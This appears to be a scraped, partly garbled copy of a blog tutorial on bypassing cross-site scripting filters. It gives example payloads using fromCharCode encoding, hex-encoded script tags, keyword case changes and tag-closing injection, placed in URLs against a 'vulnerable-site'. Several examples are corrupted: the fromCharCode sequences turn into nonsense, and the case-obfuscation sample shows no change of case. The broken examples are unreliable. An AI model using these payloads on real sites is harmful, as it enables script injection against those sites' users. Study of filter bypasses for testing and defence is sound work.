Original http://alihassanpenetrationtester.blogspot.com/2013/01/bypassing-xss-filters-advanced-xss.html
Hi friends, last time, I explained what's XSS and how a attacker can inject malicious script in your site. As I promised earlier, I am writing this advanced XSS tutorial for you (still more articles would come)
.
Sometimes, website owner use XSS filters (WAF) to protect against XSS vulnerability.
For eg:if you put the <scirpt>alert ("Hi") </script>, the Filter would escape the "(quote) character, So the script would become
<script>alert (>xss detected<) </script>
Now the script won ' t work. Likewise Filters use different type of filtering method to give protection against the XSS. In this case, we can use some tricks to bypass the filter. Here I am going to cover.
1.Bypassing MAGIC_QUOTES_GPC
The Magic_quotes_gpc=on is a PHP setting (configured in PHP.ini File), it escapes the Every ' (Single-quote), "(Doubl e quote) and \ with a backslash automatically.
For Eg:
<scirpt>alert ("HI");</script> 'll be filtered as <script>alert (\hi\) </script>.so the script Won ' t work now.
This is the well known filtering method, but we can easily bypass this filter by using ASCII characters instead.
For Eg:alert ("HI"); Can is converted to
String.fromCharCode (108, 101, 104
, Max, $, $,--)
So the script would become <script>string.fromcharcode ($, 108, 101, A, A, a, a, a 104, a. Pt>. In this case there is no "(quotes) or ' (a quotes) or/so the filter can ' t filter this thing. Yes, it'll successfully run the script.
String.fromCharCode () is a JavaScript function, which converts ASCII value to characters.
How to convert to ASCII values?
There is some online sites that converts to ASCII character. But I suggest the use Hackbar Mozilla addon.
After installing Hackbar add on, press F9. It'll open the small box above the URL bar. Click the Xss->string.fromcharcode ()
Now it'll popup small window. Enter the code for instance alert ("Hi"). Click OK button. Now we got the output.
Copy the code into the <script></script> inside and inserts in the vulnerable sites
For eg:
Hxxp://vulnerable-site/search?q=<script>string.fromcharcode (97, 108, 101, 114, 116, 40, 34, 104, 105, 34, 41, ) </script>
2.HEX Encoding
We can encode our whole script to HEX code so the It can ' t be filtered.
For example: <script>alert ("Hi");</script> can is convert to HEX as:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
Now put the code in the vulnerable site request.
For ex:
hxxp://vulnerable-site/search?q=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63% 72%69%70%74%3e
Converting to HEX:
This site would convert to hex code:http://centricle.com/tools/ascii-hex/
3.Bypassing using obfuscation
Some website Admin put the script,alert in restricted word list. So whenever your input this keywords, the filter would remove it and would give error message like "is not allowed To search this ". This can bypassed by changing the case of the keywords (namely obfuscation).
For eg:
<script>alert ("Hi");</script>
This bypass technique rarely works and giving trial is worth.
4. Closing Tag
Sometimes putting "> at the beginning of the code would work.
"><script>alert (" Hi ");</script>
This would end the previous opened tag and open our script tag.
Example:
hxxp://vulnerable-site/search?q= "><script>alert (" Hi ");</script>
Conclusion:
From above article, it's clear that XSS filters alone not going to protect a site from the XSS attacks. If you really want to make your site more secure, then ask Pentesters to test your application or test yourself.
Also There is lot of the different filter bypassing technique, I just covered some useful techniques for you.
Disclaimer:
This article are intended for educational purpose only.
"Foreign language" advanced XSS Tutorials for WEB application Pen testing